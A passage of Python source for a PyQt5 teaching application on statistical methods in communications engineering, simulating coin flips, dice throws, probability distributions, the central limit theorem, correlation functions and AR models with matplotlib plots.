le: list[Optional[list[QLineEdit]]]
intline: list[Optional[list[QLineEdit]]]
pb: list[Optional[list[QPushButton]]]
combobox: list[Optional[QComboBox]]
stack: list[Optional[QWidget]]
sp: list[Optional[QSpinBox]]
group: list[Optional[list[QGroupBox]]]
def __init__(self):
super().__init__()
# -- -- #
self.n_pages = 13
# -- -- #
self.tree = None
self.tree_dict = None
self.stackedWidget = None
self.stack = [None] * self.n_pages
self.le = [None] * self.n_pages
self.var_dict = None
self.groupbox = None
self.link21 = None
self.intline = [None] * self.n_pages
self.sp = [None] * self.n_pages
self.pb = [None] * self.n_pages
self.icon = None
self.label = [None] * self.n_pages
self.filename = None
self.group = [None] * self.n_pages
self.combobox = [None] * self.n_pages
# -- -- #
self.initUI()
'This is the main window,left is tree menu and right part are the stacked windows.'
def initUI(self):
self.setFixedSize(700, 450)
self.setWindowTitle('Tool of SMNt')
self.setStyleSheet("background-color:'silver'")
hbox = QHBoxLayout(self)
left = QFrame(self)
left.setFixedSize(235, 450)
right = QFrame(self)
splitter1 = QSplitter(Qt.Horizontal)
splitter1.setSizes([35, ])
splitter1.addWidget(left)
splitter1.addWidget(right)
hbox.addWidget(splitter1)
self.setLayout(hbox)
self.tree = QTreeWidget(left)
list_00 = [self.tree.setMinimumSize, self.tree.setStyleSheet, self.tree.setAutoScroll,
self.tree.setEditTriggers, self.tree.setTextElideMode, self.tree.setRootIsDecorated,
self.tree.setUniformRowHeights, self.tree.setItemsExpandable, self.tree.setAnimated,
self.tree.setHeaderHidden, self.tree.setExpandsOnDoubleClick, self.tree.setObjectName]
list_01 = [[35, 450], ["background-color:'silver';border:outset;color:seagreen;font:bold;font-size:15px"],
[True], [QAbstractItemView.DoubleClicked | QAbstractItemView.EditKeyPressed], [Qt.ElideMiddle],
[True], [False], [True], [False], [True], [True], ["tree"]]
for i, j in zip(list_00, list_01):
i(*j)
self.tree_dict = {}
list_02 = ["root", "root1", "root2", "root3", "child11", "child12", "child13", "child14", "child21", "child22",
"child25", "child31", "child32", "child33"]
list_03 = [None, None, None, None, "root1", "root1", "root1", "root1", "root2",
"root2", "root2", "root3", "root3", "root3"]
list_04 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
list_05 = ['HomePage', 'Probability', 'Correlation Function', 'Estimation Function', 'Coin Flipping',
'Dice Throw', 'Distribution Simulation', 'Central Limit Theorem', 'Correlation Coefficient',
'Correlation Function', 'AR Model', 'Maximum likelihood', 'confidence ellipse', "waveforms"]
for i, j, k, l in zip(list_02, list_03, list_04, list_05):
if j is None:
self.tree_dict[i] = QTreeWidgetItem(self.tree)
else:
self.tree_dict[i] = QTreeWidgetItem(self.tree_dict[j])
self.tree_dict[i].setText(k, l)
self.tree.addTopLevelItem(self.tree_dict["root"])
self.stackedWidget = QStackedWidget(right)
self.stack = [QWidget() for i in range(13)]
for func in [self.stackUI0, self.stackUI1, self.stackUI2, self.stackUI3, self.stackUI4, self.stackUI5,
self.stackUI6, self.stackUI7, self.stackUI8, self.stackUI9, self.stackUI10, self.stackUI11,
self.stackUI12]:
func()
for i in range(len(self.stack)):
self.stackedWidget.addWidget(self.stack[i])
self.tree.clicked.connect(self.Display)
'Change the stacked windows.'
def Display(self):
item = self.tree.currentItem()
switcher = {
"HomePage": 0,
"Coin Flipping": 1,
"Dice Throw": 2,
"Distribution Simulation": 3,
"Central Limit Theorem": 4,
"Correlation Coefficient": 5,
"Correlation Function": 6,
"AR Model": 9,
"Maximum likelihood": 10,
"confidence ellipse": 11,
"waveforms": 12
}
i = switcher.get(item.text(0), None)
if i is not None:
self.stackedWidget.setCurrentIndex(i)
'----------------Homepage------------------------------'
def stackUI0(self):
layout = QVBoxLayout(self.stack[0])
self.label[0] = [QLabel()]
self.label[0][0].setText("Statistische Methoden \nder Nachrichtentechnik\nVer.1.0")
self.label[0][0].setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
self.label[0][0].setAlignment(Qt.AlignCenter)
self.label[0][0].setFont(QFont("Sanserif", 15, QFont.Bold))
layout.addWidget(self.label[0][0])
'---------------------Coin----------------------------'
def stackUI1(self):
vlayout = QVBoxLayout(self.stack[1])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
vlayout.addWidget(grid)
self.le[1] = [QLineEdit() for i in range(2)]
self.var_dict = {}
list_00 = ["pb1_2", "pb1_1", "help"]
list_01 = ["Execute", "Clear", "Help"]
list_02 = [self.coin, self.clear11, self.msg1]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12"], ["Times:", "Probability:"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"], *self.le[1],
self.var_dict["pb1_2"], self.var_dict["pb1_1"]]
list_04 = [1, 2, 3, 2, 3, 4, 5]
list_05 = [2, 0, 0, 1, 1, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def msg1(self):
QMessageBox.about(self, "Help", "This function is a simulator of coin flipping.\n"
"Input the number of flipping times and the probability of head.\n"
"The simulator will generate a graphic of probability change polyline.\n"
"Can generate multiple images simultaneously.")
def coin(self):
try:
times = []
frequency = []
n_heads = 0
n_instances = 0
number = int(self.le[1][0].text())
probability = float(self.le[1][1].text())
'when number of trials is smaller than 100,we need a solid sampling interval'
for flip_num in range(0, number):
if random.random() <= probability:
n_heads += 1
n_instances += 1
frequency.append(n_heads / n_instances)
times.append(n_instances)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(times, frequency, color='b', label='(actual) relative occurrence')
ax.set_xlabel('Number of Trials')
ax.set_ylabel('Frequency')
ax.set_ylim([0, 1])
ax.set_xlim([1, number])
'red line is the probability of head'
ax.plot([-0, number], [probability, probability], label='Theoretical Probability', color='r',
linewidth='1.5')
ax.legend(loc=0)
plt.title('{} times Flip with Probability p(head)= {} '.format(number, probability))
plt.grid(axis='y')
plt.show()
except:
self.Error()
def clear11(self, index=1):
for i in self.le[index]:
i.clear()
'---------------------Dice----------------------------'
def stackUI2(self):
vlayout = QVBoxLayout(self.stack[2])
gridlayout = QGridLayout()
gridlayout2 = QGridLayout()
grid = QWidget()
grid2 = QWidget()
grid.setLayout(gridlayout)
grid2.setLayout(gridlayout2)
self.groupbox = QGroupBox('5 Platonic Solids', self)
self.groupbox.setLayout(gridlayout)
self.link21 = QLabel()
self.link21.setOpenExternalLinks(True)
self.link21.setText(u'<a href="https://en.wikipedia.org/wiki/Platonic_solid" style="color:#0000ff;">'
u'<b>Wikipedia</b></a>')
self.link21.setStyleSheet('font-size: 11px')
self.intline[2] = [QLineEdit() for i in range(3)]
self.pb[2] = []
self.icon = {}
list_00 = ["1", "2", "3", "4", "5"]
list_01 = ["4.png", "6.png", "8.png", "12.png", "20.png"]
list_02 = ["4", "6", "8", "12", "20"]
list_03 = ["Tetrahedron 4 faces", "Cube 6 faces", "Octahedron 8 faces", "Dodecahedron 12 faces",
"Icosahedron 20 faces"]
for j, k, l, m in zip(list_00, list_01, list_02, list_03):
self.pb[2].append(QPushButton())
self.icon[j] = QIcon()
self.icon[j].addPixmap(QPixmap(k), QIcon.Normal, QIcon.Off)
self.pb[2][-1].setIcon(self.icon[j])
self.pb[2][-1].setIconSize(QSize(50, 50))
self.pb[2][-1].clicked.connect(functools.partial(self.intline[2][1].setText, l))
self.pb[2][-1].setToolTip(m)
for j, k in zip(["Help", "Execute", "Clear"], [self.msg2, self.dice_simulation, self.clear21]):
self.pb[2].append(QPushButton(j))
self.pb[2][-1].clicked.connect(k)
self.label[2] = [QLabel(text) for text in ["Number of dice:", "Faces of dice:", "Throw times:"]]
list_07 = [*self.pb[2][:5], self.link21, *self.pb[2][5:], *self.intline[2], *self.label[2]]
list_08 = [2, 2, 2, 2, 2, 3, 1, 5, 6, 2, 3, 4, 2, 3, 4]
list_09 = [0, 1, 2, 3, 4, 4, 2, 2, 2, 1, 1, 1, 0, 0, 0]
for i in zip(list_07[:6], list_08[:6], list_09[:6]):
gridlayout.addWidget(*i)
for i in zip(list_07[6:], list_08[6:], list_09[6:]):
gridlayout2.addWidget(*i)
vlayout.addWidget(self.groupbox)
vlayout.addWidget(grid2)
def clear21(self, index=2):
for i in self.intline[index]:
i.clear()
def msg2(self):
QMessageBox.about(self, "Help", "This function is a simulator of dice throw .\n"
"The simulator will generate a graphic of probability distribution.\n"
"Can generate multiple images simultaneously.")
def dice_simulation(self):
try:
number, face, time = [int(i.text()) for i in self.intline[2]]
list_dice = np.arange(1, face + 1)
# result = [sum(random.choices(list_dice, k=10)) for i in range(time)]
result = [sum(random.choices(list_dice, k=number)) for i in range(time)]
fig = plt.figure()
ax = fig.add_subplot(111)
'the formula of bins makes the histogram looks more comfortable'
# histo = ax.hist(result, color='RoyalBlue', bins=np.arange((face-1) * number + 4)-0.5, label='occurrence')
histo = ax.hist(result, color='RoyalBlue', bins=np.arange(face * number + 2) - 0.5, label='occurrence')
ax.set_xlim([number - 1, number * face + 1])
ax.set_xlabel('Dice Points')
ax.set_ylabel('total occurence')
ax.legend(loc=1)
plt.title('{} times Toss {} dice each has {} faces'.format(time, number, face))
plt.grid()
plt.show()
except:
self.Error()
'-----------------Distribution-------------------------'
def stackUI3(self):
layout = QVBoxLayout()
glayout = QGridLayout()
gbox = QWidget()
gbox.setLayout(glayout)
self.combobox[3] = QComboBox()
font31 = QFont()
font31.setPointSize(16)
self.combobox[3].setFont(font31)
list_00 = ["Please select...", "Beta_Distribution", "Binomial_Distribution", "Cauchy_Distribution",
"Chi2_Distribution", "Expon_Distribution", "F_Distribution", "Gamma_Distribution",
"Geometric_Distribution", "Laplace_Distribution", "Logistic_Distribution", "Lomax_Distribution",
"Lognorm_Distribution", "Negative_Binomial_Distribution", "Normal_Distribution",
"Poisson_Distribution", "Rayleigh_Distribution", "T_Distribution", "Weibull_Distribution",
"Zipf_Distribution"]
for i in list_00:
self.combobox[3].addItem(i)
self.combobox[3].currentIndexChanged.connect(self.Select_onChange31)
self.le[3] = [QLineEdit() for i in range(2)]
self.label[3] = [QLabel()] + [QLabel(text) for text in [" ", "1. parameter:", "2. parameter:"]]
self.label[3][1].setFont(QFont('Sanserif', 15))
self.label[3][1].setStyleSheet("font:bold")
self.pb[3] = []
for i, j in zip(['Execute', 'Clear', 'Help'], [self.Select_onChange32, self.clear31, self.msg3]):
self.pb[3].append(QPushButton(i))
self.pb[3][-1].clicked.connect(j)
for i in [self.combobox[3], *self.label[3][:2], gbox]:
layout.addWidget(i)
list_00 = [*self.label[3][2:], *self.le[3], *self.pb[3]]
list_01 = [1, 2, 1, 2, 2, 3, 1]
list_02 = [0, 0, 1, 1, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
glayout.addWidget(*i)
self.stack[3].setLayout(layout)
def clear31(self, index=3):
for i in self.le[index]:
i.clear()
def msg3(self):
QMessageBox.about(self, "Help", "This function is a simulator of general distributions.\n"
"The simulator will generate a graphic of probability distribution.\n"
"Inputboxes support multiple sets of parameters like '0.5,0.7,1.0'")
def Select_onChange31(self):
switcher = {
"Binomial_Distribution": ["binomial.svg", [200, 60], 'n={}\n' 'p={}'],
"Normal_Distribution": ["normal.svg", [200, 60], 'μ={}\n' 'σ²={}'],
"Poisson_Distribution": ["poisson.svg", [250, 70], 'λ={}'],
"Rayleigh_Distribution": ["rayleigh.svg", [250, 60], 'σ={}'],
"Beta_Distribution": ["Beta.svg", [200, 60], 'α={}\n' 'β={}'],
"F_Distribution": ["f.svg", [450, 350], 'd1={}\n' 'd2={}'],
"Gamma_Distribution": ["gamma2.svg", [300, 50], 'k={} θ={}'],
"Geometric_Distribution": ["geometric.svg", [290, 60], 'p={}'],
"Lognorm_Distribution": ["lognorm.svg", [250, 60], 'μ={}\n' 'σ={}'],
"Chi2_Distribution": ["chi2.svg", [300, 140], 'df={}'],
"Cauchy_Distribution": ["cauchy.svg", [350, 80], 'x0={}\n' 'γ={}'],
"Laplace_Distribution": ["laplace.svg", [200, 60], 'μ={}\n' 'λ={}'],
"T_Distribution": ["t.svg", [300, 90], 'v={}'],
"Expon_Distribution": ["exponential.svg", [200, 60], 'λ={}'],
"Weibull_Distribution": ["weibull.svg", [350, 80], 'λ={}\n' 'a={}'],
"Negative_Binomial_Distribution": ["negativ.svg", [300, 60], 'n={}\n' 'p={}'],
"Lomax_Distribution": ["lomax.svg", [250, 60], 'λ={}\n' 'α={}'],
"Logistic_Distribution": ["logistic.svg", [300, 170], 'μ={}\n' 's={}']
}
if self.combobox[3].currentText() == 'Please select...':
self.label[3][0].setText(' ')
self.label[3][1].setText(' ')
elif self.combobox[3].currentText() == 'Zipf_Distribution':
self.label[3][0].setText('No pic')
self.label[3][0].setScaledContents(True)
self.label[3][0].setMaximumSize(200, 60)
self.label[3][1].setText('a={}')
else:
i = switcher.get(self.combobox[3].currentText(), None)
self.label[3][0].setPixmap(QPixmap(i[0]))
self.label[3][0].setScaledContents(True)
self.label[3][0].setMaximumSize(*i[1])
self.label[3][1].setText(i[2])
def _decorator(self, func):
def inner(*args, **kwargs):
try:
n_args = len(inspect.getfullargspec(func).args)
sp = [self.le[3][i].text().split(',') for i in range(n_args)]
if len(sp) > 1 and not all(len(sp[0]) == len(x) for x in sp[1:]):
QMessageBox.about(self, "Warning", "The length of the two rows is not the same.")
else:
func(*sp, *args, **kwargs)
except:
self.Error()
return inner
def Select_onChange32(self):
switcher = {
"Binomial_Distribution": self._decorator(distribution_displays.Binomial_Distribution),
"Normal_Distribution": self._decorator(distribution_displays.Normal_Distribution),
"Poisson_Distribution": self._decorator(distribution_displays.Poisson_Distribution),
"Rayleigh_Distribution": self._decorator(distribution_displays.Rayleigh_Distribution),
"Beta_Distribution": self._decorator(distribution_displays.Beta_Distribution),
"F_Distribution": self._decorator(distribution_displays.F_Distribution),
"Gamma_Distribution": self._decorator(distribution_displays.Gamma_Distribution),
"Geometric_Distribution": self._decorator(distribution_displays.Geometric_Distribution),
"Lognorm_Distribution": self._decorator(distribution_displays.Lognorm_Distribution),
# "Uniform_Distribution": self._decorator(distribution_displays.Uniform_Distribution),
"Chi2_Distribution": self._decorator(distribution_displays.Chi2_Distribution),
"Cauchy_Distribution": self._decorator(distribution_displays.Cauchy_Distribution),
"Laplace_Distribution": self._decorator(distribution_displays.Laplace_Distribution),
"T_Distribution": self._decorator(distribution_displays.T_Distribution),
"Expon_Distribution": self._decorator(distribution_displays.Expon_Distribution),
"Weibull_Distribution": self._decorator(distribution_displays.Weibull_Distribution),
"Zipf_Distribution": self._decorator(distribution_displays.Zipf_Distribution),
"Negative_Binomial_Distribution": self._decorator(distribution_displays.Negative_Binomial_Distribution),
"Lomax_Distribution": self._decorator(distribution_displays.Lomax_Distribution),
"Logistic_Distribution": self._decorator(distribution_displays.Logistic_Distribution)
}
switcher.get(self.combobox[3].currentText(), lambda: None)()
def Error(self):
QMessageBox.about(self, 'Warning', 'Error happened!\n'
'please check parameters!')
'----------------------Central Limit Theorem----------------------------'
def stackUI4(self):
layout = QVBoxLayout()
layout1 = QGridLayout()
hbox1 = QWidget()
hbox1.setLayout(layout1)
self.pb[4] = [QPushButton(text) for text in ['Execute', 'Help', 'Clear']]
self.le[4] = [QLineEdit() for i in range(2)]
self.label[4] = [QLabel(text) for text in ['Number of dice:', 'Number of times:', 'Central limit theorem']]
self.label[4][2].setStyleSheet(
"background-color:'RoyalBlue';border:outset;color:'yellow';font:bold;font-size:20px"
)
self.label[4][2].setAlignment(Qt.AlignCenter)
self.label[4][2].setGeometry(20, 30, 600, 300)
list_00 = [*self.label[4][:2], *self.le[4], *self.pb[4]]
list_01 = [2, 3, 2, 3, 4, 1, 5]
list_02 = [0, 0, 1, 1, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
layout1.addWidget(*i)
layout.addWidget(self.label[4][2])
layout.addWidget(hbox1)
for i, j in zip(self.pb[4], [self.CentralLimintTheorem, self.msg4, self.clear41]):
i.clicked.connect(j)
self.stack[4].setLayout(layout)
def clear41(self, index=4):
for i in self.le[index]:
i.clear()
def msg4(self):
QMessageBox.about(self, 'Help', 'the more dice and the more loop times,makes the histgram more like approach'
' the Normal Distribution')
def CentralLimintTheorem(self):
try:
number = int(self.le[4][0].text())
times = int(self.le[4][1].text())
mu = 3.5 * number
sigma = (35 / 12) * number
x = np.arange(1 * number - 1, 6 * number + 1, 0.1)
y = norm.pdf(x, loc=mu, scale=math.sqrt(sigma))
samples_sum = []
for i in range(times):
sample = np.random.randint(1, 7, size=number)
sum = np.sum(sample)
samples_sum.append(sum)
fig = plt.figure(tight_layout=True)
ax = fig.add_subplot(111)
ax.hist(samples_sum, bins=np.arange(4 + 5 * number) - 0.5, density=True, color='RoyalBlue', alpha=0.9,
label='relative occurrence')
ax.set_xlabel('Dice Points')
ax.set_ylabel('relative occurence')
ax.set_xlim([number - 2, number * 6 + 2])
ax.legend(loc=2)
ax2 = ax.twinx()
ax2.plot(x, y, label='Theoretical Value', color='r')
ax2.legend(loc=1)
ax2.set_ylabel('Probability')
ax2.set_ylim(ymin=0)
plt.title('{} dice {} throws'.format(number, times))
ax2.set_ylim(ax.get_ylim())
plt.grid()
plt.show()
except:
self.Error()
'---------------------------Correlation example-------------------------------------------------'
def stackUI5(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
hlayout = QHBoxLayout()
hbox = QWidget()
hbox.setLayout(hlayout)
self.label[5] = [QLabel(text) for text in ['Title precision:', 'x.xx']]
self.sp[5] = QSpinBox()
self.sp[5].setValue(2)
self.sp[5].setMinimum(0)
self.sp[5].setSingleStep(1)
self.sp[5].valueChanged.connect(functools.partial(lambda x: x.label[5][1].setText("x." + x.sp[5].value() * "x"),
self))
for i in [*self.label[5], self.sp[5]]:
hlayout.addWidget(i)
group = [QGroupBox(text, self) for text in ['Example', 'Input Data']]
for i, j in zip(group, layout_i):
i.setLayout(j)
for i in [hbox, *group]:
layout.addWidget(i)
self.pb[5] = [QPushButton(text) for text in
['Weak correlation', 'Strong correlation', 'Uncorrelated', 'AddFile']]
list_00 = [0, 0, 0, 1]
list_01 = [1, 1, 1, 1]
list_02 = [0, 1, 2, 0]
list_03 = [self.Weak_correlation, self.Strong_correlation, self.Uncorrelated, self.Openfile_coe]
for i, j, *k, l in zip(list_00, self.pb[5], list_01, list_02, list_03):
layout_i[i].addWidget(j, *k)
j.clicked.connect(l)
self.stack[5].setLayout(layout)
def Valuechange51(self): # In my opinion 3 levels are enough
self.label[5][1].setText("x." + self.sp[5].value() * "x")
def base_correlation(self, func):
try:
x = np.arange(1, 101)
y = func(x)
coefxy = np.corrcoef(x, y)
pxy = coefxy[0, 1]
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, marker='o', linestyle='None')
plt.plot(x, y1, c='r', label='fitted line')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} Fitted line: y = {res.intercept:.{self.sp[5].value()}f}"
f" + {res.slope:.{self.sp[5].value()}f} * x")
plt.grid()
plt.legend()
plt.show()
except:
self.Error()
def Weak_correlation(self):
self.base_correlation(lambda x: np.random.randn(100) * 350 + np.random.randint(-10, 10, 1) * x)
def Strong_correlation(self):
self.base_correlation(lambda x: np.random.randn(100) * 50 + np.random.randint(-10, 10, 1) * x)
def Uncorrelated(self):
x0 = np.linspace(-1, 1, 200) # Draw a circle in polar coordinates
y0 = np.sqrt(1 - x0 ** 2)
list1 = []
list2 = []
for i in range(200):
a = (-1) ** random.randint(0, 1)
b = random.random() * 0.1
list1.append(a)
list2.append(b)
y1 = np.multiply(y0, list1)
list3 = np.array(list2)
y2 = y1 + list3
coefxy = np.corrcoef(x0, y2)
pxy = coefxy[0, 1]
plt.plot(x0, y2, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} No fitted line")
plt.grid()
plt.show()
def Openfile_coe(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.Openfile_coe2()
except Exception as r:
self.Error()
def loader(self):
with open(self.filename, 'r') as f:
f_csv = csv.reader(f)
csv_list = []
for row in f_csv:
csv_list.append(row)
x = csv_list[0]
x = list(map(int, x))
y = csv_list[1]
y = list(map(int, y))
return x, y
def Openfile_coe2(self):
x, y = self.loader()
cov = np.cov(*self.loader())
result1 = cov[0, 0] * cov[1, 1]
result2 = cov[0, 1] * cov[1, 0]
if result1 != 0 and result2 != 0: # Check whether the data is independent
coefxy = np.corrcoef(x, y)
pxy = coefxy[0, 1]
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.plot(x, y1, c='r', label='fitted line')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} Fitted line: y = {res.intercept:.{self.sp[5].value()}f}"
f" + {res.slope:.{self.sp[5].value()}f} * x")
plt.legend()
plt.grid()
plt.show()
else:
plt.plot(x, y, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {0:.{self.sp[5].value()}f} No fitted line")
plt.grid()
plt.show()
'===================CCF========================='
def stackUI6(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
self.group[6] = [QGroupBox(text, self) for text in ['Example', 'Input Data']]
for i, j in zip(self.group[6], layout_i):
i.setLayout(j)
layout.addWidget(i)
self.pb[6] = [QPushButton(i) for i in ["CCF", "ACF", "ACF_Rxx", "AddFile1_CCF", "AddFile2_ACF",
"AddFile3_Linear_Regression"]]
list_00 = [1, 1, 1, 1, 1, 1]
list_01 = [0, 1, 2, 0, 1, 2]
list_02 = [self.ccf, self.acf, self.acf_Rxx, self.add_file_01, self.add_file_02, self.add_file_03]
for i, *j, k in zip(self.pb[6][:3], list_00[:3], list_01[:3], list_02[:3]):
layout_i[0].addWidget(i, *j)
layout_i[0].addWidget(i)
i.clicked.connect(k)
for i, *j, k in zip(self.pb[6][3:], list_00[3:], list_01[3:], list_02[3:]):
layout_i[1].addWidget(i, *j)
layout_i[1].addWidget(i)
i.clicked.connect(k)
self.stack[6].setLayout(layout)
def acf_Rxx(self):
# x = np.array([50,47,60,88,20,19,12,57,49,33,42,10,99,22,58,67,90,56,33,74,23,62,90,29,74,10,29,74,57,15])
x1 = np.arange(1, 50, 0.01)
x2 = np.cos(x1)
x3 = x2[0]
n = len(x3)
o = np.arange(1 - n, n)
var = np.var(x3, ddof=1)
mx = np.mean(x3)
autocorrelation = np.correlate(x3, x3, 'full')
plt.plot(o, autocorrelation, marker='o', linestyle='None')
plt.plot([1 - n, n], [var + mx * 2, var + mx * 2], c='g', linestyle='--')
plt.plot([1 - n, n], [mx * 2, mx * 2], c='r', linestyle='--')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Autocorrelation function')
plt.grid()
plt.show()
def ccf(self):
x = np.array([50, 47, 60, 88, 20, 19, 12, 57, 49, 33, 42, 10, 99, 22, 58, 67, 90, 56, 33, 74, 23, 62, 90, 29,
74, 10, 29, 74, 57, 15])
y = np.array([20, 70, 66, 40, 53, 22, 14, 68, 43, 89, 54, 55, 3, 78, 56, 4, 9, 41, 14, 24, 68, 64, 87, 45, 33,
67, 55, 22, 86, 45])
n = len(x)
o = np.arange(1 - n, n)
crosscorrelation = np.correlate(x, y, 'full')
plt.plot(o, crosscorrelation, marker='o', linestyle='None')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Cross correlation function')
plt.grid()
plt.show()
def acf(self):
x = np.array([50, 47, 60, 88, 20, 19])
n = len(x)
o = np.arange(1 - n, n)
autocorrelation = np.correlate(x, x, 'full')
plt.plot(o, autocorrelation, marker='o', linestyle='None')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Autocorrelation function')
plt.grid()
plt.show()
'------------------------------------------------------'
'-------------------------------------------------------'
def stackUI7(self):
pass
def get_data(self, func, title):
try:
x, y = self.loader()
n = len(x)
o = np.arange(1 - n, n)
correlation = func(x, y)
plt.plot(o, correlation, marker='o')
plt.xlabel('Time')
plt.ylabel('R')
plt.title(title)
plt.show()
plt.grid()
except:
self.Error()
def add_file_01(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.self.get_data(lambda x, y: np.correlate(x, y, 'full'), 'Cross correlation function')
except:
self.Error()
def add_file_02(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.self.get_data(lambda x, y: np.correlate(x, x, 'full'), 'Autocorrelation function')
except:
self.Error()
def add_file_03(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.get_data3()
except:
self.Error()
def get_data3(self):
try:
x, y = self.loader()
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, 'o', label='original data')
plt.plot(x, y1, 'r', label='fitted line')
plt.legend()
plt.show()
except:
self.Error()
'------------------AR-----------------------------'
'-------------------------AR Model----------------------------------'
def stackUI8(self): # This part is the application of ARMA Model in the economic field, which is inconsistent
# with the teaching purpose of this lecture
# layout = QVBoxLayout()
#
# self.pb81 = QPushButton('Dataset')
# self.pb82 = QPushButton('coefficient')
# self.pb84 = QPushButton('Prediction')
# self.pb81.clicked.connect(self.Dataset)
# self.pb82.clicked.connect(self.coefficient)
# self.pb84.clicked.connect(self.Prediction)
#
# self.df = pd.read_csv(
# 'https://raw.githubusercontent.com/jbrownlee/Datasets/master/daily-min-temperatures.csv',
# index_col=0, parse_dates=True)
#
# layout.addWidget(self.pb81)
# layout.addWidget(self.pb82)
# layout.addWidget(self.pb84)
# self.stack8.setLayout(layout)
pass
def Dataset(self):
pass
# self.df.plot()
# plt.show()
def coefficient(self):
pass
# a = self.df.Temp
# b = self.df.Temp.shift(1)
# coefficient = pearsonr(a[1:], b[1:])
# lag_plot(self.df)
# plt.title('Correlation coefficient:r = {:.2f}'.format(coefficient[0]))
# plt.show()
def ACF_PACF(self):
pass
# fig, axes = plt.subplots(2, 1)
# plot_acf(self.df['Temp'], ax=axes[0])
# plot_pacf(self.df['Temp'], ax=axes[1])
#
# plt.tight_layout()
# plt.show()
def Prediction(self):
pass
# x = self.df.values
# train, test = x[:-7], x[-7:]
# model_fit = AR(train).fit()
# params = model_fit.params
# p = model_fit.k_ar
# # p = 1
# history = train[-p:]
# history = np.hstack(history).tolist()
# test = np.hstack(test).tolist()
#
# predictions = []
# for t in range(len(test)):
# lag = history[-p:]
# yhat = params[0]
# for i in range(p):
# yhat += params[i + 1] * lag[p - 1 - i]
# predictions.append(yhat)
# obs = test[t]
# history.append(obs)
# print(np.mean((np.array(test) - np.array(predictions)) ** 2)) # 得到mean_squared_error, MSE
# plt.plot(test, color='b',label='Reality')
# plt.plot(predictions, color='r',label='Prediction')
# plt.legend()
# plt.show()
def stackUI9(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
self.group[9] = [QGroupBox(text, self) for text in ['Sample generate', 'Graphic']]
for i, j in zip(self.group[9], layout_i):
i.setLayout(j)
layout.addWidget(i)
self.label[9] = [QLabel(text) for text in ["b1:", "σw^2"]]
self.le[9] = [QLineEdit() for i in range(2)]
self.pb[9] = []
for i, j in zip(["Execute", "Rxx", "rxx"], [self.sample_generate91, self.Rxx91, self.rxx91]):
self.pb[9].append(QPushButton(i))
self.pb[9][-1].clicked.connect(j)
list_00 = [*self.label[9], *self.le[9], *self.pb[9]]
list_01 = [2, 3, 2, 3, 4, 1, 2]
list_02 = [0, 0, 1, 1, 2, 1, 1]
for i in zip(list_00[:5], list_01[:5], list_02[:5]):
layout_i[0].addWidget(*i)
for i in zip(list_00[5:], list_01[5:], list_02[5:]):
layout_i[1].addWidget(*i)
self.stack[9].setLayout(layout)
def sample_generate91(self):
try:
b1 = float(self.le[9][0].text())
ar_coefs = [1]
ar_coefs.append(b1)
ma_coefs = [1, 0]
sigma_s = float(self.le[9][1].text())
max_lag = 15
y = arma_generate_sample(ar_coefs, ma_coefs, nsample=100)
x = np.arange(100)
plt.plot(x, y)
plt.title('Time Series b1 = {} σw^2 = {}'.format(b1, sigma_s))
plt.show()
except:
self.Error()
def Rxx91(self):
try:
b1 = float(self.le[9][0].text())
sigma_w_2 = float(self.le[9][1].text())
sigma_x_2 = sigma_w_2 / (1 - b1 ** 2)
Rxx = []
for m in range(-10, 11, 1):
y = b1 ** abs(m) * sigma_x_2
Rxx.append(y)
x = np.arange(-10, 11)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(x, Rxx, 'bo')
ax.set_ylim([0, None])
plt.title('Rxx b1 = {} σw^2 = {}'.format(b1, sigma_w_2))
plt.grid()
plt.show()
except:
self.Error()
# coefficient
def rxx91(self):
try:
b1 = float(self.le[9][0].text())
sigma_w_2 = float(self.le[9][1].text())
sigma_x_2 = sigma_w_2 / (1 - b1 ** 2)
Rxx = []
for m in range(0, 11, 1):
y = b1 ** abs(m) * sigma_x_2
Rxx.append(y)
rxx = []
for i in Rxx:
i /= sigma_x_2
rxx.append(i)
x = np.arange(0, 11)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(x, rxx, 'bo')
ax.set_ylim([0, None])
plt.title('rxx b1 = {} σw^2 = {}'.format(b1, sigma_w_2))
plt.grid()
plt.show()
except:
self.Error() # coeff
'-------------------------Estimation Model----------------------------------'
def stackUI10(self):
layout = QVBoxLayout()
glayout = QGridLayout()
gbox = QWidget()
gbox.setLayout(glayout)
self.combobox[9] = QComboBox()
self.combobox[10] = QComboBox()
font31 = QFont()
font31.setPointSize(16)
self.combobox[9].setFont(font31)
